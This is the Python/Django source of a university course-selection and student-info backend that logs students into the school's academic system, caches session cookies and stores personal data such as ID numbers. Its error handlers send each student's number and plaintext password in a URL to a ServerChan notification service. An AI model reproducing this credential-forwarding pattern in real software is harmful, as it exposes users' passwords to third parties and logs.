storage = lgn.login_page()
filename = ('Storage')
newData(xh, filename, json.dumps(storage, ensure_ascii=False))
def login_pages_get(xh):
filename = ('Storage')
storage = cacheData(xh, filename)
return storage
def get_kaptcha(xh):
login_pages_set(xh)
storage = login_pages_get(xh)
kaptcha = storage["kaptcha"]
return HttpResponse(json.dumps({'kaptcha':kaptcha}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def get_choosed(request):
"""已选课程"""
myconfig = Config.objects.all().first()
year = (myconfig.nChoose)[0:4]
term = (myconfig.nChoose)[4:]
if term == "1":
term = "3"
elif term == "2":
term = "12"
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'refresh':request.POST.get("refresh")
}
res = requests.post(url=myconfig.otherapi+"/choose/choosed",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
refresh = request.POST.get("refresh")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录访问已选课程' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
if refresh == "no":
filename = ('Choosed')
cache = cacheData(xh, filename)
if cache is not None:
# print('cache')
print('【%s】查看了已选缓存' % stu.name)
return HttpResponse(json.dumps(cache, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
pass
try:
startTime = time.time()
print('【%s】查看了已选' % stu.name)
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = Xuanke(base_url=base_url, cookies=cookies, year=year, term=term)
choosed = person.get_choosed()
endTime = time.time()
spendTime = endTime - startTime
if choosed is None:
content = ('【%s】[%s]访问已选课程出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = Xuanke(base_url=base_url, cookies=sta, year=year, term=term)
nchoosed = person.get_choosed()
filename = ('Choosed')
newData(xh, filename, json.dumps(nchoosed, ensure_ascii=False))
return HttpResponse(json.dumps(nchoosed, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif choosed.get('err'):
ServerChan = config["ServerChan"]
text = choosed.get('err')
if ServerChan == "none":
return HttpResponse(json.dumps({'err':text}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
requests.get(ServerChan + 'text=' + text)
return HttpResponse(json.dumps({'err':'已选课程未知错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]访问了已选课程,耗时%.2fs' % (
datetime.datetime.now().strftime('%H:%M:%S'), stu.name, spendTime))
writeLog(content)
filename = ('Choosed')
newData(xh, filename, json.dumps(choosed, ensure_ascii=False))
return HttpResponse(json.dumps(choosed, ensure_ascii=False),
content_type="application/json,charset=utf-8")
except Exception as e:
# print(e)
ServerChan = config["ServerChan"]
text = "已选课程未知错误"
if ServerChan == "none":
return HttpResponse(json.dumps({'err':'已选课程未知错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
requests.get(ServerChan + 'text=' + text + '&desp=' + str(e) + '\n' + str(xh) + '\n' + str(pswd))
return HttpResponse(json.dumps({'err':'已选课程未知错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def get_bkk_list(request):
"""板块课(通识选修课)"""
myconfig = Config.objects.all().first()
year = (myconfig.nChoose)[0:4]
term = (myconfig.nChoose)[4:]
if term == "1":
term = "3"
elif term == "2":
term = "12"
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'bkk':request.POST.get("bkk")
}
res = requests.post(url=myconfig.otherapi+"/choose/bkk",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
bkk = request.POST.get("bkk")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录访问板块课' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
try:
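                # The bkk category code from the client is inverted ("1" <-> "2") before the
                # request, since Xuanke.get_bkk_list apparently expects the opposite value.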
bkk = "1" if bkk=="2" else "2"
startTime = time.time()
print('【%s】查看了板块课' % stu.name)
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = Xuanke(base_url=base_url, cookies=cookies, year=year, term=term)
bkk_list = person.get_bkk_list(bkk)
endTime = time.time()
spendTime = endTime - startTime
if spendTime > 30:
ServerChan = config["ServerChan"]
text = "板块课超时"
if ServerChan == "none":
return HttpResponse(json.dumps({'err':'板块课超时'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
requests.get(ServerChan + 'text=' + text)
return HttpResponse(json.dumps({'err':'板块课超时'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
content = ('【%s】[%s]访问了板块课,耗时%.2fs' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name, spendTime))
writeLog(content)
return HttpResponse(json.dumps(bkk_list, ensure_ascii=False), content_type="application/json,charset=utf-8")
except Exception as e:
print(e)
content = ('【%s】[%s]访问板块课出错' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
if myconfig.isKaptcha:
return get_kaptcha(xh)
else:
sta = update_cookies(request)
person = Xuanke(base_url=base_url, cookies=sta, year=year, term=term)
bkk_list = person.get_bkk_list(bkk)
return HttpResponse(json.dumps(bkk_list, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
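# choose() derives gradeId and majorId straight from the student number: the first two digits
# (prefixed with "20") give the enrolment year and digits 3-6 give the major code.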
def choose(request):
"""选课"""
myconfig = Config.objects.all().first()
year = (myconfig.nChoose)[0:4]
term = (myconfig.nChoose)[4:]
if term == "1":
term = "3"
elif term == "2":
term = "12"
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'doId':request.POST.get("doId"),
'kcId':request.POST.get("kcId"),
'kklxdm':request.POST.get("kklxdm")
}
res = requests.post(url=myconfig.otherapi+"/choose/choose",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
doId = request.POST.get("doId")
kcId = request.POST.get("kcId")
gradeId = '20' + str(xh)[0:2]
majorId = str(xh)[2:6]
kklxdm = request.POST.get("kklxdm")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录选课' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = Xuanke(base_url=base_url, cookies=cookies, year=year, term=term)
result = person.choose(doId, kcId, gradeId, majorId, kklxdm)
return HttpResponse(json.dumps(result, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def cancel(request):
"""取消选课"""
myconfig = Config.objects.all().first()
year = (myconfig.nChoose)[0:4]
term = (myconfig.nChoose)[4:]
if term == "1":
term = "3"
elif term == "2":
term = "12"
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'doId':request.POST.get("doId"),
'kcId':request.POST.get("kcId"),
}
res = requests.post(url=myconfig.otherapi+"/choose/cancel",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
doId = request.POST.get("doId")
kcId = request.POST.get("kcId")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if not Students.objects.filter(studentId=int(xh)):
content = ('【%s】[%s]未登录选课' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'还未登录,请重新登录!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
stu = Students.objects.get(studentId=int(xh))
JSESSIONID = str(stu.JSESSIONID)
route = str(stu.route)
cookies_dict = {
'JSESSIONID': JSESSIONID,
'route': route
}
cookies = requests.utils.cookiejar_from_dict(cookies_dict)
person = Xuanke(base_url=base_url, cookies=cookies, year=year, term=term)
result = person.cancel(doId, kcId)
return HttpResponse(json.dumps(result, ensure_ascii=False), content_type="application/json,charset=utf-8")
else:
return HttpResponse(json.dumps({'err':'请使用post并提交正确数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
```
#### File: zfnweb/info/models.py
```python
from django.db import models
from django.utils.encoding import smart_str
class Students(models.Model):
studentId = models.IntegerField(verbose_name="学号",primary_key=True)
name = models.CharField(verbose_name="姓名",max_length=30)
    sex = models.IntegerField(verbose_name="性别",choices=((1,"男"),(2,"女")),default=1)  # max_length is not valid on IntegerField
collegeName = models.CharField(verbose_name="学院",max_length=40)
majorName = models.CharField(verbose_name="专业",max_length=40)
className = models.CharField(verbose_name="班级",max_length=40)
classMonitor = models.IntegerField(verbose_name="是否班委",choices=((0,"不是"),(1,"是")),default=0)
gpa = models.CharField(verbose_name="GPA",max_length=10,default="init")
phoneNumber = models.CharField(verbose_name="手机号",max_length=20)
birthDay = models.CharField(verbose_name="生日",max_length=20)
graduationSchool = models.CharField(verbose_name="毕业中学",max_length=40,default="init")
domicile = models.CharField(verbose_name="所在地",max_length=20,default="init")
email = models.CharField(verbose_name="邮箱",max_length=36,default="init")
national = models.CharField(verbose_name="民族",max_length=6,default="init")
idNumber = models.CharField(verbose_name="身份证号码",max_length=20,default="init")
JSESSIONID = models.CharField(max_length=60)
route = models.CharField(max_length=80)
searchTimes = models.CharField(verbose_name="查询次数",max_length=30,default="2020-01-01,3")
refreshTimes = models.IntegerField(verbose_name="访问次数",default=0)
updateTime = models.CharField(verbose_name="最后登录",max_length=40)
def __str__(self):
return smart_str('%s-%s' % (self.studentId, self.name))
@classmethod
def create(cls,studentId,name,sex,collegeName,majorName,className,phoneNumber,birthDay,graduationSchool,domicile,email,national,idNumber,JSESSIONID,route,updateTime):
return cls(studentId=studentId, name=name, sex=sex, collegeName=collegeName, majorName=majorName, className=className, phoneNumber=phoneNumber, birthDay=birthDay, graduationSchool=graduationSchool, domicile=domicile, email=email, national=national, idNumber=idNumber, JSESSIONID=JSESSIONID, route=route, updateTime=updateTime)
class Meta:
db_table = "students"
verbose_name = '学生'
verbose_name_plural = '学生'
class Teachers(models.Model):
name = models.CharField(verbose_name="姓名",max_length=20)
sex = models.CharField(verbose_name="性别",max_length=20,default="-")
collegeName = models.CharField(verbose_name="学院",max_length=40,default="-")
title = models.CharField(verbose_name="职称",max_length=40,default="-")
phoneNumber = models.CharField(verbose_name="手机号",max_length=20)
QQ = models.CharField(verbose_name="QQ号码",max_length=20,default="-")
wechat = models.CharField(verbose_name="微信",max_length=20,default="-")
def __str__(self):
return smart_str('%s-%s' % (self.collegeName, self.name))
# @classmethod
# def create(cls,name,collegeName,phoneNumber):
# return cls(name=name,collegeName=collegeName,phoneNumber=phoneNumber)
class Meta:
db_table = "teachers"
verbose_name = '教师'
verbose_name_plural = '教师'
```
#### File: zfnweb/info/views.py
```python
import datetime
import os
import time
import traceback
import json
import requests
import openpyxl
from bs4 import BeautifulSoup
from api import GetInfo, Login, PLogin, Personal, Infos, Search
from django.utils.encoding import escape_uri_path
from django.http import HttpResponse, JsonResponse, FileResponse
from info.models import Students, Teachers
from mp.models import Config
from openpyxl.styles import Font, colors, Alignment
with open('config.json', mode='r', encoding='utf-8') as f:
config = json.loads(f.read())
base_url = config["base_url"]
def index(request):
return HttpResponse('info_index here')
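# calSex: the 17th digit of a Chinese ID number encodes sex (odd = male, even = female);
# the return value matches the Students.sex choices (1 = male, 2 = female).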
def calSex(id):
sexNum = id[16:17]
if int(sexNum)%2==0:
return 2
else:
return 1
def diffList(list1,list2):
return [x for x in list1 if x not in list2]
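# mywarn wraps an error payload for the client and, when a ServerChan push URL is configured,
# also forwards the error together with the student number/password to the maintainer.
# Note: the ServerChan value from config.json is assumed to end with "?" or "&" already,
# because the query string below is concatenated onto it directly.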
def mywarn(text,desp,xh,pswd):
ServerChan = config["ServerChan"]
errData = {'err':text+',请返回重试'} if "错误" in text else {'err':text+',建议访问一下“课程通知”以便刷新cookies'}
if ServerChan == "none":
return HttpResponse(json.dumps(errData, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
requests.get(ServerChan + 'text=' + text + '&desp=' + desp + '\n' + str(xh) + '\n' + str(pswd))
return HttpResponse(json.dumps(errData, ensure_ascii=False),
content_type="application/json,charset=utf-8")
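# On-disk cache layout: data/<first two digits of xh>/<xh>/<filename>.json.
# cacheData returns the parsed JSON, or None when the file is missing or the cached payload
# itself carries an "err" key; newData always overwrites the file with the latest data.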
def cacheData(xh, filename):
docurl = 'data/' + str(xh)[0:2] + '/' + str(xh) + '/'
fileurl = docurl + str(filename) + '.json'
if not os.path.exists(docurl):
os.makedirs(docurl)
else:
if not os.path.exists(fileurl):
return
else:
with open(fileurl, mode='r', encoding='utf-8') as o:
result = json.loads(o.read())
if result.get("err"):
return
return result
def newData(xh, filename, content):
docurl = 'data/' + str(xh)[0:2] + '/' + str(xh) + '/'
fileurl = docurl + str(filename) + '.json'
    if not os.path.exists(docurl):
        os.makedirs(docurl)
    # overwrite with the latest content regardless of whether the directory already existed
    with open(fileurl, mode='w', encoding='utf-8') as n:
        n.write(content)
# if not os.path.exists(fileurl):
# with open(fileurl, mode='w', encoding='utf-8') as n:
# n.write(content)
def writeLog(content):
date = datetime.datetime.now().strftime('%Y-%m-%d')
filename = 'mylogs/' + date + '.log'
if not os.path.exists(filename):
with open(filename, mode='w', encoding='utf-8') as n:
n.write('【%s】的日志记录' % date)
with open(filename, mode='a', encoding='utf-8') as l:
l.write('\n%s' % content)
def login_pages_set(xh):
lgn = Login(base_url=base_url)
storage = lgn.login_page()
filename = ('Storage')
newData(xh, filename, json.dumps(storage, ensure_ascii=False))
def login_pages_get(xh):
filename = ('Storage')
storage = cacheData(xh, filename)
return storage
def get_kaptcha_net(request):
xh = request.GET.get("xh")
login_pages_set(xh)
storage = login_pages_get(xh)
kaptcha = storage["kaptcha"]
return HttpResponse(json.dumps({'kaptcha':kaptcha}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
def get_kaptcha(xh):
myconfig = Config.objects.all().first()
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
login_pages_set(xh)
storage = login_pages_get(xh)
kaptcha = storage["kaptcha"]
return HttpResponse(json.dumps({'kaptcha':kaptcha}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
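# update_cookies re-logs the student in with the submitted credentials (reusing the cached login
# page/captcha when isKaptcha is enabled), stores the fresh JSESSIONID/route on the Students row
# and re-fetches the personal info cache. With captcha mode on it returns an HttpResponse;
# otherwise it returns the new cookiejar so the caller can retry its original request.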
def update_cookies(request):
myconfig = Config.objects.all().first()
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
try:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
kaptcha = request.POST.get("kaptcha")
stu = Students.objects.get(studentId=int(xh))
refreshTimes = int(stu.refreshTimes)
startTime = time.time()
content = ('【%s】[%s]更新cookies' % (datetime.datetime.now().strftime('%H:%M:%S'), stu.name))
writeLog(content)
# print('原cookies:')
# print('{JSESSIONID:%s,route:%s}' % (stu.JSESSIONID,stu.route))
lgn = Login(base_url=base_url)
if myconfig.isKaptcha:
storage = login_pages_get(xh)
if storage is None:
return get_kaptcha(xh)
lgn.login_kaptcha(storage["cookies"],xh, pswd,storage["tokens"],storage["n"],storage["e"],kaptcha)
else:
lgn.login(xh, pswd)
if lgn.runcode == 1:
cookies = lgn.cookies
# person = GetInfo(base_url=base_url, cookies=cookies)
NJSESSIONID = requests.utils.dict_from_cookiejar(cookies)["JSESSIONID"]
if myconfig.isKaptcha:
nroute = storage["cookies"]["route"]
else:
nroute = requests.utils.dict_from_cookiejar(cookies)["route"]
ncookies = requests.utils.cookiejar_from_dict({"JSESSIONID":NJSESSIONID,"route":nroute})
updateTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
refreshTimes += 1
Students.objects.filter(studentId=int(xh)).update(JSESSIONID=NJSESSIONID, route=nroute,
refreshTimes=refreshTimes, updateTime=updateTime)
endTime = time.time()
spendTime = endTime - startTime
# print('新cookies:')
content = ('【%s】更新cookies成功,耗时%.2fs' % (datetime.datetime.now().strftime('%H:%M:%S'), spendTime))
writeLog(content)
person = GetInfo(base_url=base_url, cookies=ncookies)
pinfo = person.get_pinfo()
if stu.email == "无":
Students.objects.filter(studentId=int(xh)).update(email=pinfo["email"])
# print(pinfo)
filename = ('Pinfo')
newData(xh, filename, json.dumps(pinfo, ensure_ascii=False))
# print(requests.utils.dict_from_cookiejar(cookies))
if myconfig.isKaptcha:
return HttpResponse(json.dumps({'success':'更新cookies成功'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
return cookies
elif lgn.runcode == 4:
return HttpResponse(json.dumps({'err':'验证码错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]更新cookies时网络或其他错误!' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'网络或token问题,请返回重试'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
except Exception as e:
if str(e) == "'NoneType' object has no attribute 'get'":
return HttpResponse(json.dumps({'err':'教务系统挂掉了,请等待修复后重试~'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# return update_cookies(xh, pswd)
else:
traceback.print_exc()
return mywarn("更新cookies未知错误",str(e),xh,pswd)
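# writeToExcel expects a dict shaped like the one assembled in classGrades(), illustratively:
#   {"lastCourses": ["课程A", "课程B"],
#    "res": [{"xh": "...", "name": "...", "grades": [{"n": "课程A", "g": "90"}]}]}
# Row 1 holds 学号/姓名 plus one column per course, each following row is one student,
# and a merged footer carries the data-source notes plus the generation time.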
def writeToExcel(data, saveUrl):
    # the parameter was originally named "json", which shadowed the json module; renamed to data
    lastCourses = data["lastCourses"]
    res = data["res"]
excel = openpyxl.Workbook()
sheet1 = excel.create_sheet('sheet1', index=0)
sheet1.cell(row=1,column=1,value="学号").alignment = Alignment(horizontal='center', vertical='center')
sheet1.cell(row=1,column=2,value="姓名").alignment = Alignment(horizontal='center', vertical='center')
sheet1.column_dimensions['A'].width = 15
for c in range(0,len(lastCourses)):
sheet1.cell(row=1, column=c + 3, value=lastCourses[c]).alignment = Alignment(horizontal='center', vertical='center')
# sheet1.column_dimensions[chr(67+c)].width = 8
for items in range(0,len(res)):
sheet1.cell(row=items+2,column=1,value=res[items]["xh"]).alignment = Alignment(horizontal='center', vertical='center')
sheet1.cell(row=items+2,column=2,value=res[items]["name"]).alignment = Alignment(horizontal='center', vertical='center')
for n in range(0,len(res[items]["grades"])):
for cs in range(0,len(lastCourses)):
if res[items]["grades"][n]["n"] == lastCourses[cs]:
try:
sheet1.cell(row=items+2,column=cs+3,value=int(res[items]["grades"][n]["g"])).alignment = Alignment(horizontal='center', vertical='center')
except:
sheet1.cell(row=items+2,column=cs+3,value=res[items]["grades"][n]["g"]).alignment = Alignment(horizontal='center', vertical='center')
sheet1.merge_cells(start_row=len(res)+2, start_column=1, end_row=len(res)+5, end_column=6)
sheet1.cell(row=len(res)+2,column=1,value="1.表中数据来源须该班同学使用“西院助手”小程序访问并刷新该学期成绩\n2.留空为该同学还未刷新到最新,未使用小程序不会显示该同学行\n3.该表成绩为教务系统获取成绩,真实有效").alignment = Alignment(horizontal='center', vertical='center')
sheet1.merge_cells(start_row=len(res)+2, start_column=7, end_row=len(res)+5, end_column=10)
sheet1.cell(row=len(res)+2,column=7,value="生成时间:%s" % time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time()))).alignment = Alignment(horizontal='center', vertical='center')
excel.save(saveUrl)
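# get_pinfo doubles as the login endpoint: students already in the table get their cookies and
# counters refreshed, while first-time logins create a new Students row from the scraped personal
# info. Login.runcode is interpreted as 1 = success, 2 = wrong account/password, 4 = wrong
# captcha, anything else = network/token error.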
def get_pinfo(request):
myconfig = Config.objects.all().first()
if myconfig.apichange:
data = {
'xh':request.POST.get("xh"),
'pswd':request.POST.get("pswd"),
'kaptcha':request.POST.get("kaptcha")
}
res = requests.post(url=myconfig.otherapi+"/info/pinfo",data=data)
return HttpResponse(json.dumps(json.loads(res.text), ensure_ascii=False),
content_type="application/json,charset=utf-8")
if myconfig.maintenance:
return HttpResponse(json.dumps({'err':'教务系统出错维护中,请静待教务系统恢复正常!'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
# if mpconfig["loginbad"]:
# return HttpResponse(json.dumps({'err':'当前教务系统无法请求登录,请待学校修复!'}, ensure_ascii=False),
# content_type="application/json,charset=utf-8")
if request.method == 'POST':
if request.POST:
xh = request.POST.get("xh")
pswd = request.POST.get("pswd")
kaptcha = request.POST.get("kaptcha")
else:
return HttpResponse(json.dumps({'err':'请提交正确的post数据'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if Students.objects.filter(studentId=int(xh)):
stu = Students.objects.get(studentId=int(xh))
refreshTimes = int(stu.refreshTimes)
try:
startTime = time.time()
lgn = Login(base_url=base_url)
if myconfig.isKaptcha:
storage = login_pages_get(xh)
if storage is None:
return get_kaptcha(xh)
lgn.login_kaptcha(storage["cookies"],xh, pswd,storage["tokens"],storage["n"],storage["e"],kaptcha)
else:
lgn.login(xh, pswd)
if lgn.runcode == 1:
cookies = lgn.cookies
JSESSIONID = requests.utils.dict_from_cookiejar(cookies)["JSESSIONID"]
if myconfig.isKaptcha:
route = storage["cookies"]["route"]
else:
route = requests.utils.dict_from_cookiejar(cookies)["route"]
ncookies = requests.utils.cookiejar_from_dict({"JSESSIONID":JSESSIONID,"route":route})
person = GetInfo(base_url=base_url, cookies=ncookies)
pinfo = person.get_pinfo()
if pinfo.get("idNumber")[-6:] == pswd:
return HttpResponse(json.dumps({'err':"新生或专升本同学请在教务系统(jwxt.xcc.edu.cn)完善信息并审核且修改密码后登陆小程序!"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if pinfo.get('err'):
if pinfo.get('err') == "Connect Timeout":
return mywarn("登录超时","",xh,pswd)
else:
                            return HttpResponse(json.dumps(pinfo, ensure_ascii=False),
                                content_type="application/json,charset=utf-8")
refreshTimes += 1
updateTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
Students.objects.filter(studentId=int(xh)).update(JSESSIONID=JSESSIONID, route=route,
refreshTimes=refreshTimes, updateTime=updateTime)
endTime = time.time()
spendTime = endTime - startTime
print('【%s】登录了' % pinfo["name"])
content = ('【%s】[%s]第%d次访问登录了,耗时%.2fs' % (
datetime.datetime.now().strftime('%H:%M:%S'), pinfo["name"], refreshTimes, spendTime))
writeLog(content)
filename = ('Pinfo')
newData(xh, filename, json.dumps(pinfo, ensure_ascii=False))
return HttpResponse(json.dumps(pinfo, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif lgn.runcode == 4:
return HttpResponse(json.dumps({'err':'验证码错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif lgn.runcode == 2:
content = ('【%s】[%s]在登录时学号或者密码错误!' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'学号或者密码错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]在登录时网络或其它错误!' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'网络或token问题,请返回重试'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
except Exception as e:
if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# return get_pinfo(request)
return HttpResponse(json.dumps({'err':"请重新刷新一下"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]登录时出错' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
traceback.print_exc()
return mywarn("登录未知错误",str(e),xh,pswd)
else:
try:
startTime = time.time()
lgn = Login(base_url=base_url)
if myconfig.isKaptcha:
storage = login_pages_get(xh)
if storage is None:
return get_kaptcha(xh)
lgn.login_kaptcha(storage["cookies"],xh, pswd,storage["tokens"],storage["n"],storage["e"],kaptcha)
else:
lgn.login(xh, pswd)
if lgn.runcode == 1:
cookies = lgn.cookies
JSESSIONID = requests.utils.dict_from_cookiejar(cookies)["JSESSIONID"]
if myconfig.isKaptcha:
route = storage["cookies"]["route"]
else:
route = requests.utils.dict_from_cookiejar(cookies)["route"]
ncookies = requests.utils.cookiejar_from_dict({"JSESSIONID":JSESSIONID,"route":route})
person = GetInfo(base_url=base_url, cookies=ncookies)
pinfo = person.get_pinfo()
if pinfo.get("idNumber")[-6:] == pswd:
return HttpResponse(json.dumps({'err':"新生或专升本同学请在教务系统(jwxt.xcc.edu.cn)完善信息并审核且修改密码后登陆小程序!"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
if pinfo.get('err'):
if pinfo.get('err') == "Connect Timeout":
return mywarn("登录超时","",xh,pswd)
else:
                            return HttpResponse(json.dumps(pinfo, ensure_ascii=False),
                                content_type="application/json,charset=utf-8")
updateTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
newstu = Students.create(int(pinfo["studentId"]), pinfo["name"], calSex(pinfo["idNumber"]), pinfo["collegeName"],
pinfo["majorName"], pinfo["className"], pinfo["phoneNumber"],
pinfo["birthDay"], pinfo["graduationSchool"], pinfo["domicile"],
pinfo["email"], pinfo["national"], pinfo["idNumber"],
JSESSIONID, route, updateTime)
newstu.save()
endTime = time.time()
spendTime = endTime - startTime
print('【%s】第一次登录' % pinfo["name"])
content = ('【%s】[%s]第一次登录,耗时%.2fs' % (
datetime.datetime.now().strftime('%H:%M:%S'), pinfo["name"], spendTime))
writeLog(content)
filename = ('Pinfo')
newData(xh, filename, json.dumps(pinfo, ensure_ascii=False))
return HttpResponse(json.dumps(pinfo, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif lgn.runcode == 4:
return HttpResponse(json.dumps({'err':'验证码错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
elif lgn.runcode == 2:
content = ('【%s】[%s]在第一次登录时学号或者密码错误!' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'学号或者密码错误'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]在第一次登录时网络或其它错误!' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
return HttpResponse(json.dumps({'err':'网络或token问题,请返回重试'}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
except Exception as e:
# print(e)
if "Connection broken" in str(e) or 'ECONNRESET' in str(e):
# return get_pinfo(request)
return HttpResponse(json.dumps({'err':"请重新刷新一下"}, ensure_ascii=False),
content_type="application/json,charset=utf-8")
else:
content = ('【%s】[%s]第一次登录时出错' % (datetime.datetime.now().strftime('%H:%M:%S'), xh))
writeLog(content)
